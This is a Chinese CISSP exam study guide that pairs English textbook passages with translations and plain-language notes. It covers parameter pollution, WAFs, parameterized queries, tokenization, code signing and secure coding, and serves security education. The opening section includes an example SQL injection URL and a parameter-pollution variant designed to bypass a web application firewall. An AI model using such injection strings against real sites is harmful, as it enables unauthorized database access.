参数污染 输入验证技术是防范注入攻击的首选标准。 然而,重要的是要理解,攻击 者历史上已发现绕过几乎所有安全控制的方法。 参数污染 是攻击者成功用 来击败输入验证控制的一种技术。 参数污染通过向Web应用程序发送同一输入变量的多个值来实现。 例如, Web应用程序可能有一个名为 account 的变量,其在URL中如下所示: http://www.mycompany.com/status.php?account=12345 攻击者可能尝试通过将SQL代码注入应用程序来利用此应用程序: http://www.mycompany.com/status.php?account=12345'OR%201=1;‑‑ 然而,此字符串对Web应用程序防火墙而言显得非常可疑,很可能会被阻 止。 为隐藏攻击并绕过内容过滤机制,攻击者可能会改为发送包含两个不 同 account 值的命令: http://www.mycompany.com/status.php? account=12345& account=12345'OR%201=1;‑‑ 这种方法依赖于网页平台无法正确处理此URL的前提。

它可能仅对第一 个参数执行输入验证,然后执行第二个参数,从而使注入攻击绕过过滤 技术。 参数污染攻击依赖于网页平台未能正确处理同一参数多个副本的缺陷。 这 些漏洞已存在一段时间,大多数现代平台已对此进行防护,但由于系统未 打补丁或存在不安全的自定义代码,如今仍会发生成功的参数污染攻击。 Web Application Firew alls Web应用防火墙(WAFs)在保护Web应用程序免受攻击方面也发挥着重要 作用。 开发人员应始终构建强大的

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1441 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

日志要保护完整性、时间同步和访问控制。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
标准 标准给出必须满足的最低要求。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
日志 日志记录系统和用户活动,用于监控、审计和调查。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 48 / PDF P1442

第 1442 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

application-level defenses, such as input validation, escaped input, and parameterized queries, to protect their applications, but the reality is that applications still sometimes contain injection flaws. This can occur when developer testing is insufficient or when vendors do not promptly supply patches to vulnerable applications. WAFs function similarly to network firewalls, but they work at the Application layer of the OSI model, as discussed in Chapter 11, “Secure Network Architecture and Components.” A WAF sits in front of a web server, as shown in Figure 21.8, and receives all network traffic headed to that server.

It then scrutinizes the input headed to the application, performing input validation (whitelisting and/or blacklisting) before passing the input to the web server. This prevents malicious traffic from ever reaching the web server and acts as an important component of a layered defense against web application vulnerabilities.

中文直译 / 整理

应用层防御措施,例如输入验证、转义输入和参数化查询,以保护其应用 程序,但现实是应用程序有时仍存在注入缺陷。 这可能发生在开发人员测 试不足,或供应商未能及时为存在漏洞的应用程序提供补丁的情况下。 WAF的功能类似于网络防火墙,但它们在OSI模型的应用层工作,如第11章 “安全网络架构与组件”中所述。 WAF位于Web服务器之前,如图21.8所示, 接收所有流向该服务器的网络流量。 然后,它仔细检查发往应用程序的输入, 在将输入传递给Web服务器之前执行输入验证(白名单和/或黑名单)。 这可以 防止恶意流量到达Web服务器,并成为抵御Web应用程序漏洞的分层防御中的 重要组成部分。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

分层:分层把控制按层排列,让攻击者必须连续突破。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

防火墙:防火墙根据规则控制网络流量进出。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1442 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
分层 分层把控制按层排列,让攻击者必须连续突破。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
防火墙 防火墙根据规则控制网络流量进出。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 49 / PDF P1443

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

FIGURE 21.8 Web application firewall Database Security Secure applications depend on secure databases to provide the content and transaction processing necessary to support business operations. Databases form the core of most modern applications, and securing databases goes beyond just protecting them against SQL injection attacks. Cybersecurity professionals should have a strong understanding of secure database administration practices.

中文直译 / 整理

图 21.8 Web 应用防火墙 数据库安全 安全的应用程序依赖于安全的数据库来提供支持业务运营所需的内容和事务 处理。 数据库构成大多数现代应用程序的核心,而数据库安全不仅限于防范 SQL注入攻击。 网络安全专业人员应具备扎实的安全数据库管理实践知识。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

防火墙:防火墙根据规则控制网络流量进出。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

防火墙不是万能;它常与 IDS/IPS、分段、日志一起使用。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
防火墙 防火墙根据规则控制网络流量进出。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 50 / PDF P1444

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Parameterized Queries and Stored Procedures Parameterized queries offer another technique to protect applications against injection attacks. In a parameterized query, the developer prepares a SQL statement and then allows user input to be passed into that statement as carefully defined variables that do not allow the insertion of code. Different programming languages have different functions to perform this task. For example, Java uses the PreparedStatement() function, while PHP uses the bindParam() function. Stored procedures work in a similar manner, but the major difference is that the SQL code is not contained within the application but is stored on the database server.

The client does not directly send SQL code to the database server. Instead, the client sends arguments to the server, which then inserts those arguments into a precompiled query template. This approach protects against injection attacks and also improves database performance. Obfuscation and Camouflage Maintaining sensitive personal information in databases exposes an organization to risk in the event that information is stolen by an attacker. Database administrators should take the following measures to protect against data exposure: Data minimization is the best defense.

Organizations should not collect sensitive information that they don't need and should dispose of any sensitive information that they do collect as soon as it is no longer needed for a legitimate business purpose. Data minimization reduces risk because you can't lose control of information that you don't have in the first place. Tokenization replaces personal identifiers that might directly reveal an individual's identity with a unique identifier using a lookup table. For example, we might replace a widely known value, such as a student ID, with a randomly generated 10-digit number.

We'd then maintain a lookup table that allows us to convert those back to student IDs if we need to determine someone's identity. Of course, if you use this approach, you need to keep the lookup table secure. Hashing uses a cryptographic hash function to replace sensitive identifiers with an irreversible alternative identifier. Salting these values

中文直译 / 整理

参数化查询和存储过程 参数化查询提供了另一种保护应用程序免受注入攻击的技术。 在参数化查询中, 开发人员预先准备一条SQL语句,然后将用户输入作为精心定义的变量传入该 语句,这些变量不允许插入代码。 不同的编程语言有不同的函数来完成此任务。 例如,Java使用PreparedStatement()函数,而PHP使用bindParam()函数。 存储过程以类似的方式工作,但主要区别在于SQL代码不包含在应用程序中, 而是存储在数据库服务器上。 客户端不会直接向数据库服务器发送SQL代码, 而是向服务器发送参数,服务器随后将这些参数插入到预编译的查询模板中。 这种方法可以防止注入攻击,同时提高数据库性能。 混淆与伪装 在数据库中保存敏感个人信息会使组织在信息被攻击者窃取时面临风险。 数据库管理员应采取以下措施来保护免受数据泄露: 数据最小化 是最好的防御手段。 组织不应收集其不需要的敏感信息,并 应在该信息不再用于合法商业目的时立即处置任何已收集的敏感信息。 数 据最小化降低了风险,因为如果你根本就没有这些信息,就不可能失去对 它们的控制。 标记化 使用查找表将可能直接揭示个人身份的个人标识符替换为唯一标 识符。

例如,我们可以将众所周知的值(如学生ID)替换为随机生成的 10位数字。 然后,我们将维护一个查找表,以便在需要确定某人身份时 将这些标识符转换回学生ID。 当然,如果你采用这种方法,你需要确保 查找表的安全性。 哈希 使用加密哈希函数将敏感标识符替换为不可逆的替代标识符。 加盐这些 值

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

程序:程序是一步一步怎么做。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

检测是 IDS,主动阻断更像 IPS。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
身份 身份是主体在系统中的标识。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 51 / PDF P1445

DAD、过度保护、真实性、不可否认性与 AAA

CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

教材原文段落

with a random number prior to hashing them makes these hashed values resistant to a type of attack known as a rainbow table attack. For more information on data obfuscation techniques, see Chapter 5, “Protecting Security of Assets.” Code Security Software developers should also take steps to safeguard the creation, storage, and delivery of their code. They do this through a variety of techniques. Code Signing Code signing provides developers with a way to confirm the authenticity of their code to end users.

Developers use a cryptographic function to digitally sign their code with their own private key, and then browsers can use the developer's public key to verify that signature and ensure that the code is legitimate and was not modified by unauthorized individuals. In cases where there is a lack of code signing, users may inadvertently run inauthentic code. Code signing works by relying on the digital signature process discussed in Chapter 5, “Protecting Security of Assets.” The developer signing the code does so using a private key, whereas the corresponding public key is included in a digital certificate that is distributed with the application.

Users who download the application receive a copy of the certificate bundled with it, and their system extracts the public key and uses it in the signature verification process. It is important to note that though code signing does guarantee that the code came from an authentic source and was not modified, it does not guarantee that the code does not contain malicious content. If the developer digitally signs malicious code, that code will pass the signature verification process. Code Reuse Many organizations reuse code not only internally but by making use of third-party software libraries and software development kits (SDKs).

Thirdparty software libraries are a very common way to share code among developers. Libraries consist of shared code objects that perform related functions. For example, a software library might contain a series of functions related to biology research, financial analysis, or social media. Instead of having to write

中文直译 / 整理

在哈希前使用随机数对这些值进行加盐,可使这些哈希值抵御一种称为彩虹表 攻击的攻击类型。 有关数据混淆技术的更多信息,请参见第5章,“保护资产安全。 ” 代码安全 软件开发人员还应采取措施保护其代码的创建、存储和分发。 他们通过多种技术实 现这一点。 代码签名 代码签名为开发人员提供了一种向最终用户确认其代码真实性的方法。 开发人 员使用加密函数使用自己的私钥对代码进行数字签名,然后浏览器可以使用开 发人员的公钥验证该签名,以确保代码是合法的且未被未经授权的人员修改。 在缺乏代码签名的情况下,用户可能会无意中运行不真实的代码。 代码签名依赖于第5章中讨论的数字签名过程第5章,“保护资产安全。 ”签署 代码的开发人员使用私钥进行签名,而相应的公钥则包含在随应用程序分发的 数字证书中。 下载应用程序的用户会收到随附的证书副本,其系统会提取其中 的公钥并用于签名验证过程。 需要注意的是,尽管代码签名可以保证代码来自可信源且未被修改,但它并不 能保证代码不包含恶意内容。 如果开发者对恶意代码进行数字签名,该代码仍 可通过签名验证过程。 代码复用 许多组织不仅在内部复用代码,还通过使用第三方软件库和软件开发工具包 (SDK)来复用代码。

第三方软件库是开发者之间共享代码的非常常见的方 式。 库是由执行相关功能的共享代码对象组成的。 例如,一个软件库可能包含一系 列与生物学研究、金融分析或社交媒体相关的函数。 无需编写

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:CIA 是目标,DAD 是失败表现,AAA 是访问控制和问责链。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

真实性:真实性确认数据、身份或来源是真的,不是假冒的。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“DAD、过度保护、真实性、不可否认性与 AAA”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

证书、签名、强认证常支持真实性。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
数字签名 数字签名用私钥签署摘要,让别人用公钥验证来源和完整性。
数字证书 数字证书把身份和公钥绑定起来,由可信 CA 签发。
学习单元 52 / PDF P1446

可用性:需要时能用,且性能可接受

可用性关注中断、故障、DoS、备份和冗余。

教材原文段落

the code to perform every detailed function they need, developers can simply locate libraries that contain relevant functions and then call those functions. Organizations trying to make libraries more accessible to developers often publish SDKs. SDKs are collections of software libraries combined with documentation, examples, and other resources designed to help programmers get up and running quickly in a development environment. SDKs also often include specialized utilities designed to help developers design and test code. Organizations may also introduce third-party code into their environments when they outsource code development to other organizations.

Security teams should ensure that outsourced code is subjected to the same level of testing as internally developed code. Security professionals should be familiar with the various ways that thirdparty code is used in their organizations as well as the ways that their organization makes services available to others. It's fairly common for security flaws to arise in shared code, making it extremely important to know these dependencies and remain vigilant about security updates. Software Diversity Security professionals seek to avoid single points of failure in their environments to avoid availability risks if an issue arises with a single component. This is also true for software development.

Security professionals should watch for places in the organization that are dependent on a single piece of source code, binary executable files, or compiler. Although it may not be possible to eliminate all of these dependencies, tracking them is a critical part of maintaining a secure codebase. Code Repositories Code repositories are centralized locations for the storage and management of application source code. The main purpose of a code repository is to store the source files used in software development in a centralized location that allows for secure storage and the coordination of changes among multiple developers.

Code repositories also perform version control, allowing the tracking of changes and the rollback of code to earlier versions when required. Basically, code repositories perform the housekeeping work of software development, making it possible for many people to share work on a large software project in an organized fashion. They also meet the needs of security and auditing

中文直译 / 整理

实现每个详细功能的代码,开发人员只需找到包含相关函数的库,然后调用这些函数即可。 为使库更易于开发者使用,组织通常会发布 SDK。 SDK 是软件库的集合,附带 文档、示例和其他资源,旨在帮助程序员在开发环境中快速上手。 SDK 还通常 包含专门的工具,以帮助开发者设计和测试代码。 当组织将代码开发外包给其他组织时,也可能将其环境引入第三方代码。 安 全团队应确保外包代码接受与内部开发代码同等水平的测试。 安全专业人员应熟悉第三方代码在其组织中的各种使用方式,以及其组织向他 人提供服务的方式。 共享代码中常会出现安全漏洞,因此了解这些依赖关系并 密切关注安全更新至关重要。 软件多样性 安全专业人员力求避免其环境中出现单点故障,以防单个组件出现问题时导致 可用性风险。 软件开发领域也是如此。 安全专业人员应关注组织中依赖单一源 代码、二进制可执行文件或编译器的地方。 尽管可能无法完全消除这些依赖关 系,但追踪它们是维护安全代码库的关键环节。 代码仓库 代码仓库是用于存储和管理应用程序源代码的集中位置。 代码仓库的主要目 的是将软件开发中使用的源文件集中存储,以便实现安全存储和多个开发人 员之间的变更协调。

代码仓库还执行版本控制,以便跟踪更改并在需要时将代码回滚到早期版本。 基本上,代码仓库承担了软件开发的维护工作,使许多人能够以有组织的方式 共享大型软件项目的开发工作。 它们还满足安全性和审计的需求

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:可用性关注中断、故障、DoS、备份和冗余。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

可用性:可用性保证授权用户需要时能及时使用系统和数据。

审计:审计记录主体行为,用于追责、复盘和取证。

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“可用性:需要时能用,且性能可接受”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

没有日志和身份绑定,就很难问责。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

审计题关注独立性、证据、范围和报告。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
可用性 可用性保证授权用户需要时能及时使用系统和数据。
审计 审计记录主体行为,用于追责、复盘和取证。
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
审计 审计检查控制是否存在、是否有效、是否符合要求。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 53 / PDF P1447

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

professionals who want to ensure that software development includes automated auditing and logging of changes. By exposing code to all developers in an organization, code repositories promote code reuse. Developers seeking code to perform a particular function can search the repository for existing code and reuse it rather than start from ground zero. These code repositories may be publicly available, offering opensource code to the broader community, or they may be private repositories for use inside of an organization or team.

Code repositories also help avoid the problem of dead code, where code is in use in an organization but nobody is responsible for the maintenance of that code and, in fact, nobody may even know where the original source files reside. Integrity Measurement Code repositories are an important part of application security but are only one aspect of code management. Cybersecurity teams should also work hand in hand with developers and operations teams to ensure that applications are provisioned and deprovisioned in a secure manner through the organization's approved release management process. This process should include code integrity measurement.

Code integrity measurement uses cryptographic hash functions to verify that the code being released into production matches the code that was previously approved. Any deviation in hash values indicates that code was modified, either intentionally or unintentionally, and requires further investigation prior to release. Application Resilience When we design applications, we should create them in a manner that makes them resilient in the face of changing demand. We do this through the application of two related principles: Scalability says that applications should be designed so that computing resources they require may be incrementally added to support increasing demand.

This may include adding more resources to an existing computing instance, which is known as vertical scaling or “scaling up.” It may also include adding additional instances to a pool, which is known as horizontal scaling, or “scaling out.”

中文直译 / 整理

希望确保软件开发包含自动化审计和更改日志的专业人士。 通过向组织中的所有开发人员公开代码,代码仓库促进了代码复用。 寻求实现 特定功能代码的开发人员可以搜索仓库中的现有代码并加以复用,而不必从零 开始。 这些代码仓库可能是公开的,向更广泛的社区提供开源代码; 也可能是 私有的,仅供组织或团队内部使用。 代码仓库还有助于避免僵尸代码的问题,即代码在组织中正在使用,但无人负 责维护,甚至可能根本无人知道原始源文件的位置。 完整性测量 代码仓库是应用程序安全的重要组成部分,但只是代码管理的一个方面。 网络 安全团队应与开发人员和运维团队紧密协作,确保应用程序通过组织批准的发 布管理流程以安全的方式进行部署和撤销。 该流程应包括代码完整性测量。 代码完整性测量使用加密哈希函数来验证发布 到生产环境的代码是否与之前批准的代码一致。 任何哈希值的偏差都表明代码 已被修改(有意或无意),在发布前需要进一步调查。 应用弹性 在设计应用程序时,我们应以使其能够应对需求变化的方式构建它们。 我们通 过应用两个相关原则来实现这一点: 可扩展性指出,应用程序应设计为能够逐步增加计算资源以支持不断增长 的需求。

这可能包括为现有计算实例添加更多资源,这称为垂直扩展或 “向上扩展”。 也可能包括向资源池中添加额外的实例,这称为水平扩展, 或“向外扩展”。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:完整性不只是防黑客篡改,也包括防授权用户误操作。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

审计:审计记录主体行为,用于追责、复盘和取证。

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“完整性:数据要正确、可信、未被乱改”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希、数字签名、变更控制、输入校验常对应完整性。

没有日志和身份绑定,就很难问责。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
审计 审计记录主体行为,用于追责、复盘和取证。
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
审计 审计检查控制是否存在、是否有效、是否符合要求。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 54 / PDF P1448

第 1448 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Elasticity goes a step further than scalability and says that applications should be able to automatically provision resources to scale when necessary and then automatically deprovision those resources to reduce capacity (and cost) when they are no longer needed. You can think of elasticity as the ability to scale both up and down on an as-needed basis. Scalability and elasticity are common features of cloud platforms and are a major driver toward the use of these platforms in enterprise computing environments.

Secure Coding Practices A multitude of development styles, languages, frameworks, and other variables may be involved in the creation of an application, but many of the security issues are the same regardless of which you use. In fact, despite many development frameworks and languages providing security features, the same security problems continue to appear in applications all the time. Fortunately, a number of common best practices are available that you can use to help ensure software security for your organization. Source Code Comments Comments are an important part of any good developer's workflow.

Placed strategically throughout code, they provide documentation of design choices, explain workflows, and offer details crucial to other developers who may later be called upon to modify or troubleshoot the code. When placed in the right hands, comments are crucial. However, comments can also provide attackers with a road map explaining how code works. In some cases, comments may even include critical security details that should remain secret. Developers should take steps to ensure that commented versions of their code remain secret. In the case of compiled executables, this is unnecessary, because the compiler automatically removes comments from executable files.

However, web applications that expose their code may allow remote users to view comments left in the code. In those environments, developers should remove comments from production versions of the code before deployment. It's fine to leave the comments in place for archived source code as a reference for future developers—just don't leave them accessible to unknown individuals on the Internet.

中文直译 / 整理

弹性在可扩展性的基础上更进一步,指出应用程序应能够在必要时自动调 配资源以进行扩展,并在不再需要时自动释放这些资源以减少容量(和成 本)。 你可以将弹性理解为根据需要自动向上和向下扩展的能力。 可扩展性和弹性是云平台的常见特性,也是推动这些平台在企业计算环境中 应用的主要因素。 安全编码实践 在应用程序的开发过程中,可能涉及多种开发风格、语言、框架和其他变量, 但无论使用哪种技术,许多安全问题都是相同的。 事实上,尽管许多开发框 架和语言提供了安全功能,但相同的安全问题仍不断出现在应用程序中。 幸 运的是,存在一些通用的最佳实践,您可以利用它们来帮助确保您组织的软 件安全。 源代码注释 注释是任何优秀开发人员工作流程的重要组成部分。 它们被有策略地放置在代 码各处,用于记录设计选择、解释工作流程,并为可能日后需要修改或排查代 码的其他开发人员提供关键细节。 当注释被正确使用时,它们至关重要。 然而,注释也可能为攻击者提供一份说明代码如何工作的路线图。 在某些情况 下,注释甚至可能包含应保持机密的关键安全细节。 开发人员应采取措施,确 保其代码的注释版本保持机密。

对于编译后的可执行文件而言,这是不必要的, 因为编译器会自动从可执行文件中移除注释。 然而,暴露源代码的网页应用可 能允许远程用户查看代码中留下的注释。 在这些环境中,开发人员应在部署前 从生产版本的代码中移除注释。 将注释保留在归档的源代码中作为未来开发者 的参考是可以的——但不要让它们对互联网上的未知人员可访问。

小白解释

场景先行:你是公司的安全负责人,正在读第 1448 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1448 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

